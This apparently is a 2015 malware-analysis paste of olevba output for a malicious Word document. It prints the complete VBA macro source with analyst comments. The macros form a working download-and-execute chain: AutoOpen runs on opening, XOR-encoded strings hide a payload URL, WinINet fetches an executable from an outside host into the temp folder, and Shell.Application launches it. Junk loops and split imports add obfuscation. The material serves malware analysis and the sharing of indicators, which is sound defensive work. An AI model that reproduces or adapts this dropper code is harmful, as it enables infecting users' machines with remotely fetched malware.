dynamoo

Malicious Word macro

May 6th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- 01.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 01.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 01.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
' Trampoline in the auto-exec chain. MARCELINO is never read; the only effect
' is the call to WELDON (MARY.bas), which continues the chain toward KIRBY.
Sub HARRIS(MARCELINO As Integer)
WELDON
End Sub
  19.  
' Auto-executing entry point: Word runs autoopen when the document is opened
' with macros enabled (olevba flags it as AutoExec). The literal 332 is discarded.
' Call chain across the modules:
'   autoopen -> HARRIS -> WELDON -> JARVIS -> FREDERIC -> TRUMAN -> KIRBY
'   KIRBY -> OLLIE (WinINet download to %TEMP%\wiley4.exe) -> DONOVAN (launch it)
' Host IOCs recovered by XOR-decoding the constants in MARY.bas with key "VERNBOBBIE4":
'   URL        hxxp://aimclickbang[.]com/111/46.exe
'   drop path  <TemporaryFolder>\wiley4.exe
'   User-Agent "EMERY" (DENNY in MONROE.bas)
Sub autoopen()
HARRIS (332)
End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO MOHAMMAD.bas
  32. in file: 01.doc - OLE stream: u'Macros/VBA/MOHAMMAD'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35.  
' 64-bit declaration of wininet!InternetCloseHandle under the alias SHELBY.
' The 32-bit counterpart is in MONROE.bas; the WinINet imports are deliberately
' spread over several modules so no single module shows the whole download API.
' NOTE(review): the handle parameter is declared ByRef, so callers pass the
' address of their handle variable rather than the handle value; the real API
' takes the HINTERNET by value, so the close most likely fails silently.
#If VBA7 And Win64 Then
Public Declare PtrSafe Function SHELBY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
#End If
  39.  
' Download-and-execute driver, reached from TRUMAN (MARY.bas).
' LAZARO is overwritten immediately (ByRef, so the caller's variable changes too);
' HOMER is never used. Returns whatever DONOVAN returns (DONOVAN never sets its
' result, so this is False in practice).
Public Function KIRBY(ByRef LAZARO As Object, ByRef HOMER As Object) As Boolean
 
Dim CHARLEY As Long
' RILEY() = CreateObject("Scripting.FileSystemObject") (PORFIRIO decoded);
' TRENTON returns its GetSpecialFolder(2), i.e. the temporary folder.
Set LAZARO = TRENTON(RILEY)
 
Dim ADOLFO
 
Dim ALPHONSE As String
' MERRILL ignores 4000 and XOR-decodes FEDERICO with key HERIBERTO -> "\wiley4.exe"
ALPHONSE = MERRILL(4000, HERIBERTO, FEDERICO)
 
' Junk loop: multiplying the loop variable ends the loop after one iteration.
For CHARLEY = 26 To 47
CHARLEY = CHARLEY * 12
Next CHARLEY
' Concatenation relies on the Folder object's default property (its path):
' ADOLFO = <TemporaryFolder>\wiley4.exe
ADOLFO = LAZARO & ALPHONSE
 
' OLLIE fetches the decoded URL into that path; its result is ignored, so
' DONOVAN below runs even if the download failed or the file was not written.
If OLLIE(289, ADOLFO) Then
End If
 
 
' Launches <TemporaryFolder>\wiley4.exe via Shell.Application.Open.
KIRBY = DONOVAN(LAZARO, ALPHONSE, 681)
 
End Function
  62.  
  63.  
' String decoder used for every hidden constant in the sample.
' CHRISTOPER is the XOR key (always HERIBERTO = "VERNBOBBIE4" at the call sites);
' JEROLD is a hex string, two characters per byte.
' For the i-th byte: Chr$(hexbyte(i) Xor key[(i Mod Len(key)) + 1]) -- see
' HOLLIS (hex byte), QUINCY (key byte) and CARMELO (Xor + Chr$).
' Decoded values: SEBASTIAN -> "Shell.Application", PORFIRIO ->
' "Scripting.FileSystemObject", FEDERICO -> "\wiley4.exe",
' ULYSSES -> hxxp://aimclickbang[.]com/111/46.exe
Public Function LINWOOD(CHRISTOPER As String, JEROLD As String) As String
   
    Dim BARNEY As Integer
    Dim NESTOR As Integer
   
   
    Dim JOSIAH As Double
 JOSIAH = 312
' Dead anti-analysis check: 312 > 312 * 8 is never true, so End never fires.
If JOSIAH > JOSIAH * 8 Then End
   
    Dim FRITZ As Long
    Dim BRANT As String
    ' One iteration per hex pair (NICKOLAS = Len).
    For FRITZ = 1 To (NICKOLAS(JEROLD) / 2)
        BARNEY = HOLLIS(JEROLD, FRITZ)
        NESTOR = QUINCY(CHRISTOPER, FRITZ)
        BRANT = BRANT + CARMELO(BARNEY, NESTOR)
    Next FRITZ
   LINWOOD = BRANT
End Function
  83. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  84. ANALYSIS:
  85. +------------+-------------+-------------------------+
  86. | Type       | Keyword     | Description             |
  87. +------------+-------------+-------------------------+
  88. | Suspicious | Lib         | May run code from a DLL |
  89. | IOC        | wininet.dll | Executable file name    |
  90. +------------+-------------+-------------------------+
  91. -------------------------------------------------------------------------------
  92. VBA MACRO MILLARD.bas
  93. in file: 01.doc - OLE stream: u'Macros/VBA/MILLARD'
  94. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  95.  
  96.  
  97.  
' Returns a new Scripting.FileSystemObject: PORFIRIO XOR-decoded with
' HERIBERTO is "Scripting.FileSystemObject". The ProgID is never present in
' clear text, which is why olevba only reports a generic CreateObject here.
Public Function RILEY() As Object
Dim ISMAEL As String
ISMAEL = LINWOOD(HERIBERTO, PORFIRIO)
Set RILEY = CreateObject(ISMAEL)
End Function
  103.  
  104.  
' Returns the FRITZ-th byte (1-based) of the hex string JEROLD as a number:
' Val("&H" & Mid$(JEROLD, 2*FRITZ-1, 2)). MAURICIO is Mid$, ANIBAL is Val,
' STEFAN computes the 1-based offset of the pair; the 78 is discarded.
Public Function HOLLIS(ByRef JEROLD As String, ByRef FRITZ As Long) As Double
 HOLLIS = ANIBAL("&H" & (MAURICIO(78, JEROLD, STEFAN(FRITZ), 2)))
End Function
  108.  
  109.  
' Offset (1-based) of the FRITZ-th two-character hex pair: 1, 3, 5, ...
Public Function STEFAN(ByRef FRITZ As Long) As Long
 STEFAN = (2 * FRITZ) - 1
End Function
  113.  
  114.  
' Opens the payload URL on the WinINet session NOAH (from HIRAM/InternetOpenA)
' and returns the request handle through the ByRef out-parameter GRADY.
' Always returns True, even when GRADY comes back 0 -- the caller (OLLIE)
' checks the handle itself.
#If VBA7 And Win64 Then
       Public Function BASIL(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
    #Else
       Public Function BASIL(ByRef GRADY As Long, NOAH As Long) As Boolean
    #End If
        Dim JACQUES As Double
Dim GUADALUPE As String
Dim CLARK As Long
    ' ULYSSES XOR-decoded with HERIBERTO -> hxxp://aimclickbang[.]com/111/46.exe
    GUADALUPE = MERRILL(893, HERIBERTO, ULYSSES)
 
' Junk loop with no observable effect.
For JACQUES = 22 To 122
JACQUES = JACQUES + 2.25
Next JACQUES
    ' BERNARDO = InternetOpenUrlA(hInternet, url, headers=NULL, 0, MAXWELL, 0);
    ' MAXWELL = &H4000000 appears to be INTERNET_FLAG_NO_CACHE_WRITE -- verify.
    GRADY = BERNARDO(NOAH, GUADALUPE, vbNullString, 0, MAXWELL, 0)
    BASIL = True
End Function
  131.  
  132.  
  133. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  134. ANALYSIS:
  135. +------------+--------------+--------------------------+
  136. | Type       | Keyword      | Description              |
  137. +------------+--------------+--------------------------+
  138. | Suspicious | CreateObject | May create an OLE object |
  139. +------------+--------------+--------------------------+
  140. -------------------------------------------------------------------------------
  141. VBA MACRO MARIANO.bas
  142. in file: 01.doc - OLE stream: u'Macros/VBA/MARIANO'
  143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  144.  
  145.  
  146.  
' Thin wrapper around Len, used so the keyword does not appear in the decoder.
Public Function NICKOLAS(CLEMENT As String) As Long
NICKOLAS = Len(CLEMENT)
End Function
  150.  
' Thin wrapper around Val; HOLLIS passes "&Hxx" so this yields the byte value.
Public Function ANIBAL(FRANCES As String) As Double
Dim DILLON As Double
' Junk loop: the result is overwritten by Val below.
For DILLON = 26 To 29
DILLON = DILLON * 6.127
Next DILLON
DILLON = Val(FRANCES)
ANIBAL = DILLON
End Function
  159.  
' NICHOLAS is the FileSystemObject created by RILEY; GetSpecialFolder(2) is
' TemporaryFolder in the FileSystemObject API, so this returns the %TEMP% Folder.
Public Function TRENTON(ByRef NICHOLAS As Object) As Object
Set TRENTON = NICHOLAS.GetSpecialFolder(2)
End Function
  163.  
  164.  
  165.  
' Downloader/dropper. Fetches the decoded URL with WinINet and writes the
' response bytes to the file path ELVIS (<TemporaryFolder>\wiley4.exe).
' WYATT is unused. Returns True only if at least one byte was buffered;
' returns False without touching the file system if InternetOpenA fails.
Public Function OLLIE(WYATT As Long, ByVal ELVIS As String) As Boolean
    #If VBA7 And Win64 Then
        Dim LANNY As LongPtr, EZRA As LongPtr
    #Else
        Dim LANNY As Long, EZRA As Long
    #End If
    Dim SYDNEY As Long
    ' RUBIN is a fixed 4000-byte read buffer (DONNELL); ALPHONSO accumulates the body.
    Dim RUBIN As String * DONNELL, ALPHONSO As String
    Dim REED As Integer, ELMO As Double
    ' HIRAM = InternetOpenA("EMERY", 1, NULL, NULL, 0) -> session handle
    LANNY = HIRAM
    If LANNY = 0 Then
        Exit Function
    End If
    Dim KAREEM As Boolean
   
    ' BASIL = InternetOpenUrlA on the decoded URL; EZRA receives the request handle.
    If BASIL(EZRA, LANNY) Then
    End If
    If EZRA = 0 Then
        ELMO = 0
    Else
        ' JEFFERSON = InternetReadFile(hRequest, buf, 4000, bytesRead)
        JEFFERSON EZRA, RUBIN, DONNELL, SYDNEY
        ' The first chunk is appended in full (all 4000 chars) regardless of
        ' SYDNEY; only later chunks are trimmed to the bytes actually read.
        ALPHONSO = RUBIN
          Dim GAIL As Long
          GAIL = 10
          GAIL = GAIL + 11
' Dead check: GAIL > GAIL + 112 is never true.
If GAIL > GAIL + 112 Then End
        ' Read until InternetReadFile reports 0 bytes.
        Do While SYDNEY <> 0
            JEFFERSON EZRA, RUBIN, DONNELL, SYDNEY
                    ALPHONSO = ALPHONSO + Mid(RUBIN, 1, SYDNEY)
        Loop
             ' ELMO = length of the buffered body; REED = FreeFile (MAYNARD ignores "JOSEF").
             ELMO = NICKOLAS(ALPHONSO): _
             REED = MAYNARD("JOSEF")
        ' Write the body as a binary file at the drop path.
        Open ELVIS _
            For Binary _
        Lock Write As #REED
        Put #REED, , ALPHONSO
        GAIL = GAIL + 127
    If GAIL < 0 Then End
        Close #REED
    End If
    ' SHELBY = InternetCloseHandle; it is declared ByRef, so these most likely
    ' receive the variable's address rather than the handle and close nothing.
    SHELBY EZRA
    SHELBY LANNY
    ALPHONSO = ""
    If ELMO Then
        OLLIE = True
    End If
End Function
  213.  
' Execution stage. SEBASTIAN XOR-decoded with HERIBERTO is "Shell.Application";
' its Open method is called on LAZARO & ALPHONSE (<TemporaryFolder>\wiley4.exe),
' which launches the dropped file. RANDELL is unused, the Open result is
' discarded, and DONOVAN never assigns its return value (False to the caller).
' LENNY is undeclared; this module has no Option Explicit so that compiles.
Public Function DONOVAN(ByRef LAZARO As Object, ByRef ALPHONSE As String, RANDELL As Double) As Boolean
 
Set LENNY = CreateObject(LINWOOD _
(HERIBERTO, SEBASTIAN))
Dim DUSTY As Integer
DUSTY = LENNY.Open(LAZARO & ALPHONSE)
End Function
  221.  
  222. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  223. ANALYSIS:
  224. +------------+--------------+-----------------------------------------+
  225. | Type       | Keyword      | Description                             |
  226. +------------+--------------+-----------------------------------------+
  227. | Suspicious | Open         | May open a file                         |
  228. | Suspicious | CreateObject | May create an OLE object                |
  229. | Suspicious | Binary       | May read or write a binary file (if     |
  230. |            |              | combined with Open)                     |
  231. | Suspicious | Write        | May write to a file (if combined with   |
  232. |            |              | Open)                                   |
  233. | Suspicious | Put          | May write to a file (if combined with   |
  234. |            |              | Open)                                   |
  235. +------------+--------------+-----------------------------------------+
  236. -------------------------------------------------------------------------------
  237. VBA MACRO MARY.bas
  238. in file: 01.doc - OLE stream: u'Macros/VBA/MARY'
  239. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  240.  
Option Explicit
 
' 64-bit declaration of wininet!InternetReadFile (alias JEFFERSON); the 32-bit
' version is in MONROE.bas. CARSON is the ByRef bytes-read out-parameter.
#If VBA7 And Win64 Then
Public Declare PtrSafe Function JEFFERSON Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
#End If
' Hex-encoded ciphertexts decoded by LINWOOD (byte XOR key[(i Mod 11)+1]) with
' HERIBERTO as the key. olevba's "Base64 Strings" hit on this module is these
' hex strings, not real base64. Plaintexts:
'   SEBASTIAN -> "Shell.Application"
'   FEDERICO  -> "\wiley4.exe"
'   ULYSSES   -> hxxp://aimclickbang[.]com/111/46.exe
'   PORFIRIO  -> "Scripting.FileSystemObject"
Public Const SEBASTIAN = "163A2B2E236C033935583F26333A2B202C"
Public Const FEDERICO = "1925272E2A3B7667204C33"
Public Const ULYSSES = "2D263A32756D6D282C5935293B2D292D232C2E6B5739287D7F737E6D767F6B512E20"
Public Const PORFIRIO = "16313C2B3F362B27221A102C3E2B113631362C287B342F372D36"
' XOR key (11 characters).
Public Const HERIBERTO = "VERNBOBBIE4"
  251.  
  252.  
  253.  
' Wrapper around FreeFile; CLEMENT is ignored (OLLIE passes the junk literal "JOSEF").
Public Function MAYNARD(CLEMENT As String) As Integer
    MAYNARD = FreeFile
End Function
  257.  
' Key byte for position FRITZ: Asc(Mid$(key, (FRITZ Mod Len(key)) + 1, 1)).
' Note the key wraps starting at its 2nd character (FRITZ = 1 -> index 2).
Public Function QUINCY(ByRef CHRISTOPER As String, ByRef FRITZ As Long) As Integer
QUINCY = Asc(MAURICIO(48, CHRISTOPER, ((FRITZ Mod NICKOLAS(CHRISTOPER)) + 1), 1))
End Function
  261.  
  262.  
' Wrapper around LINWOOD(key, hex) adding a junk first argument. AUGUSTUS is
' ByRef by default but every caller passes a literal, so the write has no effect.
Public Function MERRILL(AUGUSTUS As Long, HILARIO As String, ENRIQUE As String) As String
AUGUSTUS = AUGUSTUS * 3
MERRILL = LINWOOD(HILARIO, ENRIQUE)
   
End Function
  268.  
  269.  
' Trampoline (HARRIS -> WELDON -> JARVIS). The loop is junk; 1.109 is discarded.
Public Sub WELDON()
        Dim DEWITT As Double
 
    Dim ISIDRO As Double
For ISIDRO = 53 To 55
ISIDRO = ISIDRO + 11
Next ISIDRO
 
JARVIS (1.109)
 
End Sub
  281.  
' Last trampoline before the real work: creates a FileSystemObject (RILEY) and
' hands control to KIRBY. REINALDO is only modified, never read, and the caller
' passes an expression, so the write is lost. No return value is assigned.
Public Function TRUMAN(REINALDO As Double)
 
' Local object that shadows the MERRILL function of this module; it is passed
' uninitialised to KIRBY, which overwrites it ByRef with the %TEMP% Folder.
Dim MERRILL As Object
 
 
    Dim JOHNATHON As Long
' Junk loops: adding to the loop variable ends each loop after one iteration.
For JOHNATHON = 11 To 86
JOHNATHON = JOHNATHON + 55
Next JOHNATHON
   
 
Dim WESTON  As Object
 
 
For JOHNATHON = 22 To 33
JOHNATHON = JOHNATHON + 64
Next JOHNATHON
   
 
' WESTON = Scripting.FileSystemObject; KIRBY receives it as HOMER and ignores it.
Set WESTON = RILEY
JOHNATHON = JOHNATHON + 66
Dim LEWIS As Boolean
 
' Dead check: never true for a positive value, so End never fires.
If JOHNATHON > JOHNATHON * 6 Then End
LEWIS = KIRBY(MERRILL, WESTON)
REINALDO = REINALDO + 47
End Function
  309.  
  310.  
' Trampoline (JARVIS -> FREDERIC -> TRUMAN). MERLIN and the BRENTON string
' manipulation are filler; TRUMAN ignores its argument.
Public Function FREDERIC(MERLIN As String)
Dim BRENTON As String
BRENTON = "YONG"
TRUMAN 397 + 1.08
BRENTON = BRENTON + "FAUSTINO"
End Function
  317.  
  318.  
  319.  
  320.  
  321.  
  322.  
  323.  
' Trampoline (WELDON -> JARVIS -> FREDERIC). ROSARIO and "GAVIN" are unused.
Sub JARVIS(ROSARIO As Double)
 
FREDERIC ("GAVIN")
End Sub
  328.  
' One decoder step: Chr$(cipherByte Xor keyByte). This is the only place the
' Xor/Chr keywords appear, which is what olevba reports for this module.
Public Function CARMELO(ByRef BARNEY As Integer, ByRef NESTOR As Integer) As String
    Dim CONNIE As Long
    CONNIE = BARNEY Xor NESTOR
    CARMELO = Chr$(CONNIE)
End Function
  334.  
  335.  
  336.  
  337.  
  338.  
  339. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  340. ANALYSIS:
  341. +------------+----------------+-----------------------------------------+
  342. | Type       | Keyword        | Description                             |
  343. +------------+----------------+-----------------------------------------+
  344. | Suspicious | Chr            | May attempt to obfuscate specific       |
  345. |            |                | strings                                 |
  346. | Suspicious | Xor            | May attempt to obfuscate specific       |
  347. |            |                | strings                                 |
  348. | Suspicious | Lib            | May run code from a DLL                 |
  349. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  350. |            |                | be used to obfuscate strings (option    |
  351. |            |                | --decode to see all)                    |
  352. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  353. |            |                | may be used to obfuscate strings        |
  354. |            |                | (option --decode to see all)            |
  355. | IOC        | wininet.dll    | Executable file name                    |
  356. +------------+----------------+-----------------------------------------+
  357. -------------------------------------------------------------------------------
  358. VBA MACRO MONROE.bas
  359. in file: 01.doc - OLE stream: u'Macros/VBA/MONROE'
  360. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  361.  
  362.  
  363.  
  364.  
  365.  
' Unused filler constant.
Public Const JASPER = "RUSSEL"
' WinINet imports. On 64-bit Office only InternetOpenUrlA and InternetOpenA are
' declared here (InternetCloseHandle is in MOHAMMAD.bas, InternetReadFile in
' MARY.bas); on 32-bit all four live in this module.
'   SHELBY    = InternetCloseHandle (ByRef handle -- see note in MOHAMMAD.bas)
'   BOBBIE    = InternetOpenA(agent, accessType, proxy, bypass, flags)
'   JEFFERSON = InternetReadFile(hRequest, buffer, size, ByRef bytesRead)
'   BERNARDO  = InternetOpenUrlA(hInternet, url, headers, headersLen, flags, context)
#If VBA7 And Win64 Then
Public Declare PtrSafe Function BERNARDO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As LongPtr, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
 
#Else
Public Declare Function SHELBY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
Public Declare Function BOBBIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALPHONSO As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
Public Declare Function JEFFERSON Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
Public Declare Function BERNARDO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As Long, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
#End If
 
' DONNELL: InternetReadFile chunk size / fixed buffer length used by OLLIE.
Public Const DONNELL = 4000
' DENNY: User-Agent string passed to InternetOpenA -- a network IOC.
Public Const DENNY As String = "EMERY"
' ALDEN: dwAccessType for InternetOpenA (1 appears to be INTERNET_OPEN_TYPE_DIRECT -- verify).
Public Const ALDEN = 1
' MAXWELL: dwFlags for InternetOpenUrlA (appears to be INTERNET_FLAG_NO_CACHE_WRITE -- verify).
Public Const MAXWELL = &H4000000
 
#If VBA7 And Win64 Then
Public Declare PtrSafe Function BOBBIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALPHONSO As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
#End If
  385.  
  386.  
' Wrapper around Mid$(CLEMENT, BARNEY, NESTOR). SAMMY is junk; callers pass
' literals, so the ByRef write below has no effect.
Public Function MAURICIO(SAMMY As Long, ByRef CLEMENT As String, ByRef BARNEY As Integer, ByRef NESTOR As Integer) As String
    MAURICIO = Mid$(CLEMENT, BARNEY, NESTOR)
    SAMMY = SAMMY + 23
End Function
' Opens the WinINet session: InternetOpenA("EMERY", ALDEN=1, NULL, NULL, 0).
' Returns the HINTERNET (0 on failure); OLLIE bails out on 0.
#If VBA7 _
    And Win64 Then
Public Function HIRAM() As LongPtr
 #Else
Public Function HIRAM() As Long
 
 #End If
 
 HIRAM = BOBBIE(DENNY, ALDEN, vbNullString, vbNullString, 0)
End Function
  401.  
  402.  
  403.  
  404.  
  405. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  406. ANALYSIS:
  407. +------------+----------------+-----------------------------------------+
  408. | Type       | Keyword        | Description                             |
  409. +------------+----------------+-----------------------------------------+
  410. | Suspicious | Lib            | May run code from a DLL                 |
  411. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  412. |            |                | may be used to obfuscate strings        |
  413. |            |                | (option --decode to see all)            |
  414. | IOC        | wininet.dll    | Executable file name                    |
  415. +------------+----------------+-----------------------------------------+